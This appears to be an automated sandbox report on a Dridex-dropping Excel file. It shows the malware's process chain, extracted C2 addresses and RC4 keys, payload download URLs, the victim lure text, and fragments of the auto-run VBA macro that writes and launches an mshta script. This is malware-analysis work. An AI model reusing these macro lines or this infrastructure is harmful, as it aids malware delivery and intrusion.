Play interactive tour

Edit tour

Windows Analysis Report 4TWEQh2HJb

Overview

General Information

Sample Name:	4TWEQh2HJb (renamed file extension from none to xls)
Analysis ID:	448885
MD5:	40425d09e54ff26289dd074649f0cad9
SHA1:	ae7e4df26092d9acf01b732c8144f0170ccc6556
SHA256:	6f8f1b26324ea0f3f566fbdcb4a61eb92d054ccf0300c52b3549c774056b8f02
Tags:	excelxlsx
Infos:
Most interesting Screenshot:

Detection

Dridex

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Document exploit detected (creates forbidden files)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected Dridex unpacked file

C2 URLs / IPs found in malware configuration

Document contains an embedded VBA macro which may execute processes

Document contains an embedded VBA macro with suspicious strings

Document exploit detected (process start blacklist hit)

Machine Learning detection for dropped file

Machine Learning detection for sample

Microsoft Office creates scripting files

Sigma detected: Microsoft Office Product Spawning Windows Shell

Tries to delay execution (extensive OutputDebugStringW loop)

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Tries to detect virtualization through RDTSC time measurements

Uses known network protocols on non-standard ports

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to query locales information (e.g. system language)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2820 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

mshta.exe (PID: 2104 cmdline: mshta 'C:\ProgramData\qRangeAutoFormatLocalFormat3.sct' MD5: 95828D670CFD3B16EE188168E083C3C5)

qDialogMainChartType.exe (PID: 3028 cmdline: C:\ProgramData\qDialogMainChartType.exe MD5: EA91555829C1DFDFD47709496461C5D6)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22202, "C2 list": ["202.29.60.34:443", "66.175.217.172:13786", "78.46.78.42:9043"], "RC4 keys": ["RQTJGOuDHeSyUCWzdNRZi3fWMitWY9aTc", "2UMW8pusQXiNJDgmuPITkf4TmrOt3Y13lRDWnjBuu16JkzjIG6gNuckQDkiut9pzQHVGfFdlT"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.qDialogMainChartType.exe.10000000.3.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: mshta 'C:\ProgramData\qRangeAutoFormatLocalFormat3.sct', CommandLine: mshta 'C:\ProgramData\qRangeAutoFormatLocalFormat3.sct', CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2820, ProcessCommandLine: mshta 'C:\ProgramData\qRangeAutoFormatLocalFormat3.sct', ProcessId: 2104

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 3.2.qDialogMainChartType.exe.10000000.3.unpack

Malware Configuration Extractor: Dridex {"Version": 22202, "C2 list": ["202.29.60.34:443", "66.175.217.172:13786", "78.46.78.42:9043"], "RC4 keys": ["RQTJGOuDHeSyUCWzdNRZi3fWMitWY9aTc", "2UMW8pusQXiNJDgmuPITkf4TmrOt3Y13lRDWnjBuu16JkzjIG6gNuckQDkiut9pzQHVGfFdlT"]}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\ProgramData\qDialogMainChartType.exe

ReversingLabs: Detection: 30%

Multi AV Scanner detection for submitted file

Show sources

Source: 4TWEQh2HJb.xls

Virustotal: Detection: 27%

Perma Link

Machine Learning detection for dropped file

Show sources

Source: C:\ProgramData\qDialogMainChartType.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: 4TWEQh2HJb.xls

Joe Sandbox ML: detected

Source: 3.2.qDialogMainChartType.exe.10000000.3.unpack

Avira: Label: TR/Dropper.Gen

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\ProgramData\qDialogMainChartType.exe

Unpacked PE file: 3.2.qDialogMainChartType.exe.10000000.3.unpack

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wntdll.pdb source: qDialogMainChartType.exe, 00000003.00000003.2117450423.000000007DE80000.00000004.00000001.sdmp
Source:	Binary string: wshom.pdb source: mshta.exe, 00000002.00000002.2363567124.0000000002730000.00000002.00000001.sdmp
Source:	Binary string: Gpernfedeefe.pdb source: mshta.exe, 00000002.00000003.2105631020.0000000004D5B000.00000004.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000000.2105589757.0000000010015000.00000002.00020000.sdmp, qDialogMainChartType.exe.2.dr

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\ProgramData\qRangeAutoFormatLocalFormat3.sct

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\mshta.exe

Source: global traffic

DNS query: name: onlinefastsolutions.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 208.83.69.35:8088

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 208.83.69.35:8088

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 202.29.60.34:443
Source: Malware configuration extractor	IPs: 66.175.217.172:13786
Source: Malware configuration extractor	IPs: 78.46.78.42:9043

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 8088
Source: unknown	Network traffic detected: HTTP traffic on port 8088 -> 49165

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 208.83.69.35:8088

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.15.12Date: Wed, 14 Jul 2021 18:00:06 GMTContent-Type: application/octet-streamContent-Length: 167936Connection: keep-aliveLast-Modified: Wed, 14 Jul 2021 13:48:51 GMTETag: "60eeeb43-29000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ff 81 78 c1 bb e0 16 92 bb e0 16 92 bb e0 16 92 bb e0 17 92 89 e0 16 92 b2 98 85 92 98 e0 16 92 bb e0 16 92 ba e0 16 92 b6 b2 ca 92 ba e0 16 92 b6 b2 cd 92 ba e0 16 92 b6 b2 c8 92 ba e0 16 92 52 69 63 68 bb e0 16 92 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c4 0c f0 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 40 01 00 00 50 01 00 00 00 00 00 f0 3e 01 00 00 10 00 00 00 50 01 00 00 00 00 10 00 10 00 00 00 10 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 02 00 00 10 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 52 01 00 5d 00 00 00 ec 52 01 00 68 01 00 00 00 80 02 00 20 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 02 00 01 00 00 00 10 51 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 01 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f7 38 01 00 00 10 00 00 00 40 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 0c 00 00 00 50 01 00 00 10 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 19 01 00 00 60 01 00 00 10 01 00 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ad 04 00 00 00 80 02 00 00 10 00 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 20 01 00 00 00 90 02 00 00 10 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View	IP Address: 78.46.78.42 78.46.78.42
Source: Joe Sandbox View	IP Address: 202.29.60.34 202.29.60.34
Source: Joe Sandbox View	IP Address: 66.175.217.172 66.175.217.172

Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: CMRU-AS-APChiangmaiRajabhatUniversityTH CMRU-AS-APChiangmaiRajabhatUniversityTH

Source: global traffic

HTTP traffic detected: GET /tpls/file3.bin HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: qWK3FM3Host: onlinefastsolutions.com:8088

Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: onlinefastsolutions.com

Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	String found in binary or memory: http://buyer-remindment.com:8088/css/file7.bin
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	String found in binary or memory: http://buyer-remindment.com:8088/fonts/file8.bin
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	String found in binary or memory: http://buyer-remindment.com:8088/tpls/file4.bin
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp	String found in binary or memory: http://buyer-remindment.com:8088/tpls/file4.bin:
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	String found in binary or memory: http://fasteasyupdates.com:8088/vendors/file4.bin
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.comQ
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	String found in binary or memory: http://insiderushings.com:8088/js/file13.bin
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp	String found in binary or memory: http://insiderushings.com:8088/js/file13.binj
Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: mshta.exe, 00000002.00000002.2364760786.00000000037E7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: mshta.exe, 00000002.00000002.2364760786.00000000037E7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	String found in binary or memory: http://onlinefastsolutions.com:8088/images/details.bin
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp	String found in binary or memory: http://onlinefastsolutions.com:8088/images/details.binG
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	String found in binary or memory: http://onlinefastsolutions.com:8088/images/file13.bin
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	String found in binary or memory: http://onlinefastsolutions.com:8088/js/file1.bin
Source: mshta.exe, 00000002.00000002.2362845832.000000000010E000.00000004.00000020.sdmp	String found in binary or memory: http://onlinefastsolutions.com:8088/js/file1.binT
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, mshta.exe, 00000002.00000002.2369723384.0000000004D00000.00000004.00000001.sdmp, mshta.exe, 00000002.00000002.2362918799.00000000001BF000.00000004.00000020.sdmp, mshta.exe, 00000002.00000002.2362845832.000000000010E000.00000004.00000020.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	String found in binary or memory: http://onlinefastsolutions.com:8088/tpls/file3.bin
Source: mshta.exe, 00000002.00000002.2362885454.000000000016F000.00000004.00000020.sdmp	String found in binary or memory: http://onlinefastsolutions.com:8088/tpls/file3.binQ
Source: mshta.exe, 00000002.00000002.2362885454.000000000016F000.00000004.00000020.sdmp	String found in binary or memory: http://onlinefastsolutions.com:8088/tpls/file3.binX
Source: mshta.exe, 00000002.00000002.2362885454.000000000016F000.00000004.00000020.sdmp	String found in binary or memory: http://onlinefastsolutions.com:8088/tpls/file3.binc
Source: mshta.exe, 00000002.00000002.2362845832.000000000010E000.00000004.00000020.sdmp	String found in binary or memory: http://onlinefastsolutions.com:8088/tpls/file3.bind
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	String found in binary or memory: http://paymentadvisry.com:8088/wp-theme/file7.bin
Source: mshta.exe, 00000002.00000002.2362845832.000000000010E000.00000004.00000020.sdmp	String found in binary or memory: http://paymentadvisry.com:8088/wp-theme/file7.bin3.sct
Source: mshta.exe, 00000002.00000002.2365159627.00000000039E0000.00000002.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000002.2363031596.0000000001D10000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: mshta.exe, 00000002.00000002.2364760786.00000000037E7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: mshta.exe, 00000002.00000002.2364760786.00000000037E7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: mshta.exe, 00000002.00000002.2365159627.00000000039E0000.00000002.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000002.2363031596.0000000001D10000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.ascendercorp.com/
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlt
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.bethmardutho.org.P
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.c-and-g.co.jp
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: mshta.exe, 00000002.00000002.2364760786.00000000037E7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.ncst.ernet.in/~rkjoshi
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com;Copyright
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.de
Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

Source: C:\Windows\System32\mshta.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

E-Banking Fraud:

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 3.2.qDialogMainChartType.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable Editing at the notification yellow bat i 18 11 1 19 2.And click Enable Content in next noti
Source: Screenshot number: 4	Screenshot OCR: Enable Content in next notification. 'S :: : 3.OR Use DecryptTooi from https://shop.globalsign.com
Source: Document image extraction number: 2	Screenshot OCR: Enable Editing at the notification yellow bar. 2.And click Enable Content in next notification. 3.
Source: Document image extraction number: 2	Screenshot OCR: Enable Content in next notification. 3.OR Use DecryptTooi from https://shop.globalsign.com/en/docu

Document contains an embedded VBA macro which may execute processes

Show sources

Source: 4TWEQh2HJb.xls

OLE, VBA macro line: .Exec ("mshta " & Chr(34) & Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct" & Chr(34))

Document contains an embedded VBA macro with suspicious strings

Show sources

Source: 4TWEQh2HJb.xls	OLE, VBA macro line: Set qLine = .CreateTextFile(Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct")
Source: 4TWEQh2HJb.xls	OLE, VBA macro line: Set qLine = .CreateTextFile(Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct")
Source: 4TWEQh2HJb.xls	OLE, VBA macro line: With CreateObject("Wscript.Shell")
Source: 4TWEQh2HJb.xls	OLE, VBA macro line: .Exec ("mshta " & Chr(34) & Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct" & Chr(34))
Source: 4TWEQh2HJb.xls	OLE, VBA macro line: .Exec ("mshta " & Chr(34) & Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct" & Chr(34))
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function WorkBook_Open, String createtextfile: Set qLine = . CreateTextFile(Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct")	Name: WorkBook_Open
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function WorkBook_Open, String environ: Set qLine = . CreateTextFile(Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct")	Name: WorkBook_Open
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function WorkBook_Open, String wscript: With CreateObject("Wscript.Shell")	Name: WorkBook_Open
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function WorkBook_Open, String environ: . Exec ("mshta " & Chr(34) & Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct" & Chr(34))	Name: WorkBook_Open
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function WorkBook_Open, String mshta: . Exec ("mshta " & Chr(34) & Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct" & Chr(34))	Name: WorkBook_Open

Microsoft Office creates scripting files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\ProgramData\qRangeAutoFormatLocalFormat3.sct

Jump to behavior

Source: C:\ProgramData\qDialogMainChartType.exe

Process Stats: CPU usage > 98%

Source: C:\ProgramData\qDialogMainChartType.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\ProgramData\qDialogMainChartType.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Source: C:\ProgramData\qDialogMainChartType.exe	Code function: 3_2_10012840 NtAllocateVirtualMemory,	3_2_10012840
Source: C:\ProgramData\qDialogMainChartType.exe	Code function: 3_2_1001223C NtDelayExecution,	3_2_1001223C
Source: C:\ProgramData\qDialogMainChartType.exe	Code function: 3_2_1001326C NtProtectVirtualMemory,	3_2_1001326C
Source: C:\ProgramData\qDialogMainChartType.exe	Code function: 3_2_1000BB88 NtClose,	3_2_1000BB88

Source: C:\ProgramData\qDialogMainChartType.exe	Code function: 3_2_10010754	3_2_10010754
Source: C:\ProgramData\qDialogMainChartType.exe	Code function: 3_2_10011460	3_2_10011460
Source: C:\ProgramData\qDialogMainChartType.exe	Code function: 3_2_1000846C	3_2_1000846C
Source: C:\ProgramData\qDialogMainChartType.exe	Code function: 3_2_10001494	3_2_10001494
Source: C:\ProgramData\qDialogMainChartType.exe	Code function: 3_2_1000A52C	3_2_1000A52C
Source: C:\ProgramData\qDialogMainChartType.exe	Code function: 3_2_10011D58	3_2_10011D58
Source: C:\ProgramData\qDialogMainChartType.exe	Code function: 3_2_10019348	3_2_10019348

Source: 4TWEQh2HJb.xls	OLE, VBA macro line: Sub WorkBook_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function WorkBook_Open			Name: WorkBook_Open

Source: 4TWEQh2HJb.xls

OLE indicator, VBA macros: true

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: qDialogMainChartType.exe.2.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@5/2@2/4

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVREA9C.tmp

Jump to behavior

Source: 4TWEQh2HJb.xls

OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: 4TWEQh2HJb.xls

Virustotal: Detection: 27%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\mshta.exe mshta 'C:\ProgramData\qRangeAutoFormatLocalFormat3.sct'
Source: C:\Windows\System32\mshta.exe	Process created: C:\ProgramData\qDialogMainChartType.exe C:\ProgramData\qDialogMainChartType.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\mshta.exe mshta 'C:\ProgramData\qRangeAutoFormatLocalFormat3.sct'	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\ProgramData\qDialogMainChartType.exe C:\ProgramData\qDialogMainChartType.exe	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wntdll.pdb source: qDialogMainChartType.exe, 00000003.00000003.2117450423.000000007DE80000.00000004.00000001.sdmp
Source:	Binary string: wshom.pdb source: mshta.exe, 00000002.00000002.2363567124.0000000002730000.00000002.00000001.sdmp
Source:	Binary string: Gpernfedeefe.pdb source: mshta.exe, 00000002.00000003.2105631020.0000000004D5B000.00000004.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000000.2105589757.0000000010015000.00000002.00020000.sdmp, qDialogMainChartType.exe.2.dr

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

